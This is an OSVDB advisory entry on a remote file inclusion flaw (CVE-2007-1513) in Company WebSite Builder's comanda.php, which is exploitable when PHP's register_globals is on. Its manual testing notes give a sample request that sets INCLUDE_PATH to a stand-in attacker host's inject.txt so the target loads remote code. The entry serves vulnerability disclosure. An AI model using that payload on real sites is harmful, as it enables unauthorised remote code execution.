Company WebSite Builder (CWB) comanda.php INCLUDE_PATH Variable Remote File Inclusion

2007-03-15T14:37:28
ID OSVDB:34946
Type osvdb
Reporter OSVDB
Modified 2007-03-15T14:37:28

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/cwb/comanda.php?INCLUDE_PATH=http://[attacker]/inject.txt?

References:

Other Advisory URL: http://advisories.echo.or.id/adv/adv76-theday-2007.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0182.html ISS X-Force ID: 33035 Generic Exploit URL: http://www.milw0rm.com/exploits/3485 CVE-2007-1513 Bugtraq ID: 22974